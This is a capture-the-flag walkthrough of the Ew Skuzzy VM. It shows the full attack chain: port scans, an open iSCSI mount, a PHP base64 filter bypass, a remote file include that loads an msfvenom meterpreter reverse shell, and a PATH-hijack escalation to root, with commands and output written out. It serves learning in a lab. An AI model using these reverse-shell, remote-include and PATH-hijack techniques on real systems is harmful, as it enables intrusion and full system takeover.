Ew Skuzzy CTF Walkthrough

Note: You'll notice the target IP swtiches from to This is because it took me 2 days to solve the CTF and I shutdown the VM.

This time I tried with a fairly new CTF VM, it was the Ew Skuzzy

I started by triggering an nmap to see what was open:

# nmap -sV -p 1-65535

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-03-20 21:38 ART
Nmap scan report for
Host is up (0.0019s latency).
Not shown: 65532 closed ports
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    nginx
3260/tcp open  iscsi?
MAC Address: 2C:F0:EE:30:40:BE (Apple)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 446.20 seconds

I took a look at the http server to know what was going on in there:


Then I triggered dirb to find some folders as:

# dirb

DIRB v2.22    
By The Dark Raver

START_TIME: Mon Mar 20 22:11:26 2017
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt


                                                                          GENERATED WORDS: 4612

---- Scanning URL: ----
                                                                          + (CODE:200|SIZE:1297)                    
                                                                          ==> DIRECTORY:
---- Entering directory: ----
                                                                                                                                                    ==> DIRECTORY:
---- Entering directory: ----
                                                                                                                                                    ==> DIRECTORY:
---- Entering directory: ----
                                                                                                                                                    ==> DIRECTORY:
---- Entering directory: ----
                                                                                                                                                    ==> DIRECTORY:
---- Entering directory: ----
                                                                                                                                                    ==> DIRECTORY:
---- Entering directory: ----
                                                                                                                                                      ==> DIRECTORY:
---- Entering directory: ----
                                                                                                                                                      ==> DIRECTORY:
---- Entering directory: ----
                                                                                                                                                      ==> DIRECTORY:
---- Entering directory: ----
                                                                                                                                                      ==> DIRECTORY:
---- Entering directory: ----
                                                                                                                                                      ==> DIRECTORY:
---- Entering directory: ----
                                                                                                                                                      ==> DIRECTORY:
---- Entering directory: ----
                                                                                                                                                      ==> DIRECTORY:
---- Entering directory: ----
                                                                                                                                                      ==> DIRECTORY:
---- Entering directory: ----
                                                                                                                                                      ==> DIRECTORY:
---- Entering directory: ----
                                                                                                                                                      ==> DIRECTORY:
---- Entering directory: ----
                                                                                                                                                      ==> DIRECTORY:
---- Entering directory: ----
                                                                                                                                                      ==> DIRECTORY:
---- Entering directory: ----
                                                                                                                                                      ==> DIRECTORY:
---- Entering directory: ----
                                                                                                                                                      ==> DIRECTORY:
---- Entering directory: ----
                                                                                                                                                      ==> DIRECTORY:
+ (CODE:200|SIZE:450)
---- Entering directory: ----
                                                                                                                                                      ==> DIRECTORY:
---- Entering directory: ----
                                                                                                                                                      ==> DIRECTORY:
---- Entering directory: ----
                                                                                                                                                      ==> DIRECTORY: can see it in your eyes lyricsg/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/trap/affiliates/dba/program/
---- Entering directory: ----
                                                                                                                                                      ==> DIRECTORY:
---- Entering directory: ----
                                                                           + (CODE:200|SIZE:527)
END_TIME: Mon Mar 20 22:17:49 2017

As you see it found 3 directories, by looking those dirs I found some trolling like:




But this last one wasn’t sooo troll, by looking the source code:


And by base64 decoding it I got some directions


This was clearly saying to take a look to the other port, the iscsi one.

I never used this protocol and took me a while to realize how to connect to it. I must admit the service had no auth, otherwise I’ll be still trying to get in there.

Basically I had to install open-iscsi in order to connect. Started the service and tried to discover the portal:

root@pss:~/ctf/ew# service iscsid start
root@pss:~/ctf/ew# iscsiadm -m discoverydb -t st -p 
# BEGIN RECORD 2.0-874
discovery.startup = manual
discovery.type = sendtargets
discovery.sendtargets.address =
discovery.sendtargets.port = 3260
discovery.sendtargets.auth.authmethod = None
discovery.sendtargets.auth.username = <empty>
discovery.sendtargets.auth.password = <empty>
discovery.sendtargets.auth.username_in = <empty>
discovery.sendtargets.auth.password_in = <empty>
discovery.sendtargets.timeo.login_timeout = 15
discovery.sendtargets.use_discoveryd = No
discovery.sendtargets.discoveryd_poll_inval = 30
discovery.sendtargets.reopen_max = 5
discovery.sendtargets.timeo.auth_timeout = 45
discovery.sendtargets.timeo.active_timeout = 30
discovery.sendtargets.iscsi.MaxRecvDataSegmentLength = 32768
root@pss:~/ctf/ew# iscsiadm -m discovery -t st -p,1 iqn.2017-02.local.skuzzy:storage.sys0

At this point I just needed to link the portal and mount it

root@pss:~/ctf/ew# iscsiadm -m node --targetname iqn.2017-02.local.skuzzy:storage.sys0 -p --login
Logging in to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal:,3260] (multiple)
Login to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal:,3260] successful.
root@pss:~# mount /dev/sdb /mnt
root@pss:~# cd /mnt/

By listing the files I got something I was looking for!

root@pss:/mnt# ls
bobsdisk.dsk  flag1.txt  lost+found
root@pss:/mnt# cat flag1.txt 
Congratulations! You've discovered the first flag!


Let's see how you go with the next one...

Then, I needed to know what was that bobsdisk.dsk file. So I ran a file to it:

root@pss:/mnt# file bobsdisk.dsk 
bobsdisk.dsk: Linux rev 1.0 ext2 filesystem data, UUID=faef0c66-b61b-4d80-8c20-5e8da65345d4 (large files)

It’s a disk dump!, let’s see if I can mount it!

root@pss:/mnt# mkdir ~/ctf/ew/dsk
root@pss:/mnt# mount bobsdisk.dsk ~/ctf/ew/dsk/
root@pss:/mnt# cd ~/ctf/ew/dsk/
root@pss:~/ctf/ew/dsk# ls
lost+found  ToAlice.csv.enc  ToAlice.eml
root@pss:~/ctf/ew/dsk# less ToAlice.eml 
root@pss:~/ctf/ew/dsk# cat ToAlice.eml | grep flag
PPS: flag2{054738a5066ff56e0a4fc9eda6418478d23d3a7f}

I had my second flag!

The next step would be to know what the encrypted file data is. By looking closely to the ToAlice.eml file, we find everything we need to decrypt the encripted file as:

root@pss:~/ctf/ew/dsk# openssl aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ./decrypted.txt
enter aes-256-cbc decryption password:
root@pss:~/ctf/ew/dsk# ls
decrypted.txt  lost+found  ToAlice.csv.enc  ToAlice.eml
root@pss:~/ctf/ew/dsk# cat decrypted.txt 
Web Path,Reason
5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site! 
c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?

So I had the third flag, and some web directories to look for:

The first one was just crap. :P

First Directory

The second one was different, some kind of CMS.

Second Directory

One of the URLs was loading content, more precisely this one:

I had a really bad time figuring out how to bypass that file.

I noticed that if I entered a URL different from it asked for a key. And not only that, if you add a key parameter with some of the previous flags we found the message changed to say that the key was invalid.

After some time, I noticed the p param was loading plain files, for instance ?p=flag will load the flag.php file, so I tried to access the data.txt file directly.

Data txt file

The interesting part in here is that the starting and ending tags were ##php## instead of the conventional ones. Finally I found a way to bypass some sort of eval function by converting the file first to base64. That way the reader will only display the file content. Since I already knew about the ?p param I went for the flag.php file directly.

base64 encoded flag.php file

When decoding it I found the fourth flag!

base64 decoded flag.php file


So the next step is to get a shell! This step was somehow the easier in the whole CTF. I already knew a key parameter was needed to load external files. I also knew it had the flag format because or the error message change. I tried the flag4 as key and it was the right one!

So I created a php reverse shell with msfvenom

root@pss:~/ctf/ew# msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=6000 R > www/shell1.txt No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 948 bytes

I forgot I saw in the data.txt file it was using a weird opening/closing tags, like ##php## instead of the standard ones. I edited the shell.php file and tried again.

And I published with python as:

root@pss:~/ctf/ew/www# python -m SimpleHTTPServer 80
Serving HTTP on port 80 ...

Then from msfconsole I prepared myself to get the shell! :P

root@pss:~/ctf/ew/www# msfconsole 

             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! \
                 ;@'. __*__,."    \|--- \_____________/

Love leveraging credentials? Check out bruteforcing
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.13.21-dev                         ]
+ -- --=[ 1621 exploits - 924 auxiliary - 282 post        ]
+ -- --=[ 472 payloads - 39 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/handler 
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 6000
LPORT => 6000
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set payload php/meterInterrupt: use the 'exit' command to quit
msf exploit(handler) > Interrupt: use the 'exit' command to quit
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST     yes       The listen address
   LPORT  6000             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > exploit

[*] Started reverse TCP handler on 
[*] Starting the payload handler...
[*] Sending stage (33986 bytes) to
[*] Meterpreter session 1 opened ( -> at 2017-03-21 10:40:34 -0300

meterpreter > sysinfo
Computer    : skuzzy
OS          : Linux skuzzy 4.4.0-64-generic #85-Ubuntu SMP Mon Feb 20 11:50:30 UTC 2017 x86_64
Meterpreter : php/linux
meterpreter > 

I got session as soon as I hit the CTF VM with the following url{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}&url=

After getting trolled and trolled, and kicked and trolled, I got to /opt

Listing: /opt

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
104755/rwxr-xr-x  8736  fil   2017-03-02 09:28:40 -0300  alicebackup

meterpreter > shell
Process 1967 created.
Channel 4 created.
uid=0(root) gid=0(root) groups=0(root),33(www-data)
ssh: Could not resolve hostname alice.home: Name or service not known
lost connection

uid=33(www-data) gid=33(www-data) groups=33(www-data)

ssh alice.home
Pseudo-terminal will not be allocated because stdin is not a terminal.
ssh: Could not resolve hostname alice.home: Name or service not known

By reading the ./alicebackup binary output, we can see it’s trying to run 2 commands, id and ssh. I did also run them so you can check the outputs are the same.

What we will need to get root is to update the path by injecting our id or ssh commands with a shell. Since alicebackup prints like it’s running id as root, I’ll tried replacing id first.

When running alicebackup again instead of running id as root, it’ll run sh as root giving me a root shell.

The following are just the commands secuence to get root and get the latest flag!

cd /tmp
cp /bin/sh id
echo $PATH
export PATH=/tmp:$PATH
echo $PATH
cd /opt

cd /root
ls -la
total 24
drwx------  3 root root 4096 Mar  2 22:36 .
drwxr-xr-x 23 root root 4096 Feb 28 06:51 ..
-rw-r--r--  1 root root 3106 Oct 23  2015 .bashrc
-rw-r--r--  1 root root  148 Aug 18  2015 .profile
drwx------  2 root root 4096 Mar  2 22:36 .ssh
-rw-r--r--  1 root root  493 Mar  2 22:04 flag.txt
cat flag.txt


You've found the final flag and pwned this CTF VM!

I really hope this was an enjoyable challenge, and that my trolling and messing with you didn't upset you too much! I had a blast making this VM, so it won't be my last!

I'd love to hear your thoughts on this one.
Too easy?
Too hard?
Too much stuff to install to get the iSCSI initiator working?

Drop me a line on twitter @vortexau, or via email vortex@juicedigital.net

I found this VM really funny and challenging. The 2 steps that were really hard to solve was the iscsi service and the filtering to base64 on the php portal. Also, I’ve learned a lot with this, mainly because of the trolling and a lot of false positives or false clues set. Like the scripts to Seinfeld

The soup nazi